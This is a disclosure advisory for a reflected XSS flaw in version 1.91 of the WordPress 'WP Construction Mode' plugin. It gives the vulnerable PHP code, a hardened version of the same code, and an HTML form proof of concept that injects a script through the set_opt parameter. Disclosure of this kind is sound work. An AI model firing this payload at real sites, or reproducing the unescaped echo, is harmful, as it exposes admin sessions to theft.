Title: WordPress 'WP Construction Mode' plugin - XSS
Version: 1.91
Author: Morten Nørtoft, Kenneth Jepsen, Mikkel Vej
Date: 2014/12/12
Download: https://wordpress.org/plugins/wp-construction-mode/
Contacted vendor: 2014/10/20
----------------------------------------------------------------
## Plugin description:
----------------------------------------------------------------
Set entire website or specific page under construction or maintenance for all viewers except Admin
## Reflected XSS:
----------------------------------------------------------------
The set_opt parameter is echoed back unsanitized to the admin user when saving, allowing the injection of arbitrary scripts and HTML into the admin page.
Vulnerable code:

```php
if (isset($_REQUEST['act'])) {
    switch ($_REQUEST['act']) {
        case "save":
            set_under_construction();
            // set_opt is taken straight from the request and written into the page without escaping
            echo '<div class="updated below-h2" id="message" style="position:relative; clear:both;"><p>Under Construction: ' . ($_REQUEST['set_opt']) . '</p></div>';
            break;
        default:
    }
}
```
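For comparison, the same "save" branch in a hardened form. This is an added example and not the plugin's own code or its 1.92 fix: it escapes the value on output with esc_html(), requires the manage_options capability, and verifies a nonce. The nonce action and field names (wpcm_save, wpcm_nonce) and the assumption that set_opt only ever takes the values Yes or No are assumptions made for this example.

```php
<?php
// Added example, not the plugin's code. Hardened version of the "save" branch.
// Assumes the settings form was rendered with wp_nonce_field('wpcm_save', 'wpcm_nonce')
// (hypothetical names) and that set_under_construction() exists as in the plugin.

if (isset($_REQUEST['act'])) {
    switch ($_REQUEST['act']) {
        case "save":
            // Only users allowed to manage options may change the construction mode.
            if (!current_user_can('manage_options')) {
                wp_die('Insufficient permissions.');
            }
            // Reject requests that do not carry a valid nonce (forged cross-site submissions).
            check_admin_referer('wpcm_save', 'wpcm_nonce');

            set_under_construction();

            // Normalise the input (assumption: the plugin only distinguishes Yes from No) ...
            $set_opt = isset($_REQUEST['set_opt'])
                ? sanitize_text_field(wp_unslash($_REQUEST['set_opt']))
                : '';
            $set_opt = ($set_opt === 'Yes') ? 'Yes' : 'No';

            // ... and escape on output regardless, so any value is rendered as text, never as markup.
            echo '<div class="updated below-h2" id="message" style="position:relative; clear:both;"><p>Under Construction: '
                . esc_html($set_opt) . '</p></div>';
            break;
        default:
            break;
    }
}
```

Escaping at the echo is the change that closes the reflected XSS; the capability and nonce checks are the usual WordPress admin-handler controls and stop the form in the PoC from being submitted on an admin's behalf by a third-party page.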
PoC:

Log in as admin and submit the following form.

```html
<form method="POST" action="http://[HOST]/wp-admin/admin.php?page=under-construction.php" enctype="multipart/form-data">
    <input type="text" name="set_opt" value="Yes<script>alert(document.cookie);</script>">
    <input type="text" name="set_page" value="all">
    <input type="text" name="act" value="save">
    <input type="submit">
</form>
```
## Solution
----------------------------------------------------------------
Update to version 1.92.